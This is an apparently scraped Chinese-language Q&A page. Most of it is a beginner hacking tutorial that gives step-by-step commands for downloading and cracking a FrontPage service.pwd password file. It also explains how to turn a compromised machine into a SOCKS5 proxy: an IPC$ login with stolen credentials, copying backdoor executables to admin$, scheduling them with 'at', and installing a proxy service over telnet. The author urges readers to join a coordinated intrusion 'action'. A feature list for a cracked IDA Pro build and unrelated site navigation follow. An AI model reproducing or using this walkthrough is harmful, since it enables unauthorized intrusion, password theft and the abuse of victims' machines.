打開您自己的Frontpage,文件菜單下選擇「打開站點」,然後在文件夾框里寫入http://127.0.0.1(http://不要漏掉)。按下「打開」按鈕,一會後,出現了文件夾,成功了,現在就可以操作網頁文件了。如果跳出錯誤信息,表示有密碼,我們用以下http://127.0.0.1/_vti_pvt/service.pwd,這是默認的密碼文件,下載下來,找個解密器破密碼吧!破出來後就還可以改網頁。這個只能改該網頁,沒什麼玩的。

(11)用肉雞做SOCK5代理跳板
需要軟體:srv.exe,ntlm.exe,snakeSksockserver.exe,SocksCap.exe。
首先我們在命令提示符下建立IPC$管道:
net use \\127.0.0.1\ipc$ "密碼" /user:帳號
通道建立好後,我們把srv.exe sss.exe ntlm.exe全部上傳。
c:\ srv.exe \\10.10.10.10\admin$
1 files copied!
c:\ ntlm.exe \\10.10.10.10\admin$
1 files copied!
c:\ sss.exe \\10.10.10.10\admin$
1 files copied!
復制完畢後,
看肉雞上現在的時間:
c:\net time \\127.0.0.1
顯示當前時間是 2002/4/13 晚上 09:00
我們來啟動srv.exe
c:\at \\127.0.0.1 09:01 srv.exe
等到09:01後。我們來連接肉雞:
c:\telnet 127.0.0.1 99
連上後顯示:
c:\winnt\system32>
接著我們啟動NTLM.exe
c:\winnt\system32>ntlm
顯示:
Windows 2000 Telnet Dump, by Assassin, All Rights Reserved.
Done!
C:\WINNT\system32>
首先我們終止srv.exe的telnet服務:
C:\WINNT\system32>net stop telnet
繼續:
C:\WINNT\system32>net start telnet
再啟動TELNET。
OK,我們來登陸
c:>telnet 127.0.0.1
*==========================================================
Microsoft Telnet
*==========================================================
c:>
好了,一切順利,我們現在正式開始做代理:
c:>sss.exe -install <---------開始安裝
顯示:
c:>sksockserver installed!
來看看配置:
c:>sss -config show
顯示:
SkServer Port = 1813 <----開放服務的埠 ,我們記著這個1813埠哦
SkServer StartType: 3 - Manual <---服務啟動方式
SkServer Enable Client Set Num:0 <---客戶端的項目個數
SkServer Pass SkServer Number:0 <---經過SkServer的項目個數

來啟動服務:
c:>net start skserver
提示你正在啟動,並且完成。
來檢查一下是不是啟動了:
c:>net start <-----------看看啟動的服務列表
These Windows 2000 services are started:

Print Spooler
Server
Snake SockProxy Service <---------------就是它,呵呵!
System Event Notification
TCP/IP NetBIOS Helper Service
Telephony
Telnet
The command completed successfully.

c:>_
好了,到這里我們已經做好了一個socks5代理了,我們自己的哦.OK,下面我們用sockscap來使用我們做代理。
安裝好SocksCap後,我們在桌面上打開SocksCap V2,點開File選項選Settings...彈出卡片,在 SOCKS Server裡面我們填肉雞的IP:127.0.0.1,PortT填默認的1813埠,下面的我們選socks version 5,呵呵,和 Attempt local then remot,這是域名解析的順序,先本地,然後才遠程。設置完了點「確定」我們就可以使用了,添加應用程序到sockscap裡面,點開那個"new"按鈕,會彈出一個卡片,
Profile name :程序名,隨便寫。
Command Line: 命令行,點後面的Browse...找到你的程序路徑
Working:填好上面那個,這個就自動加上.
這樣我們就把程序加到SocksCap裡面了。
現在們可以雙擊裡面的程序來使用,也可以選住程序在點"Run"來運行。

好了,終於寫完了,上面的內容都很簡單,很適合初學者,還望高手們不好見笑,剛好聽說這次5.1有很多聯盟有所行動,希望上面的內容能教會一部分人,少走彎路,讓更多的人參與這次行動。UNIX和LINUX由於自己的功力也還不夠,還差很遠,所以還不敢寫。

⑺ ida pro 6.4怎樣漢化

可保存結果的最終版來了
1 解除時間限制
2 解除每30分鍾跳出提示的限制
3 解除復制粘貼的限制
4 解除批處理限制。。。
5 增加插件支持和F5功能
6 增加保存idc功能Shift+s (實現保存分析可以根據時間保存多個快照)
7 增加各種加密狗的sig
8 增加各種iphone系統庫的sig識別
9 增加ida直接修改文件功能插件
10增加調試器隱藏反反調試插件
11增加演算法識別插件
12增加ida_sync同步分析插件
13增加arm code 插件快捷鍵I K鍵
14增加2進制數據復制粘貼插件
15增加資源導出插件
16增加UniCodeString和Unicode Convert插件來增強字元解析
測試環境winxp正常 win7x64會有一些功能不正常比方close功能
關於保存功能:
我寫了個插件保存用shift+s把當前資料庫保存成idc檔!這個功能類似於快照功能!下次用的時候先反

編譯程序完成後再用load腳本功能把你保存的idc腳本載入!分析的注釋啥的就都恢復了

熱點內容
禮儀講話腳本大全視頻 發布:2024-11-18 20:17:44 瀏覽:710
c語言通訊錄程序設計 發布:2024-11-18 19:35:21 瀏覽:99
微信下載的圖片在哪個文件夾 發布:2024-11-18 19:23:06 瀏覽:359
我的世界查伺服器ip地址 發布:2024-11-18 19:23:04 瀏覽:213
電腦加裝存儲硬碟不影響速度吧 發布:2024-11-18 19:21:52 瀏覽:694
伴生氣壓縮機 發布:2024-11-18 19:21:40 瀏覽:878
javalinux環境變數設置 發布:2024-11-18 19:20:58 瀏覽:843
按存取方式來分主存儲器 發布:2024-11-18 19:20:55 瀏覽:223
安卓屏幕如何升級 發布:2024-11-18 19:01:19 瀏覽:479
磁碟密碼在哪裡看到 發布:2024-11-18 19:01:16 瀏覽:885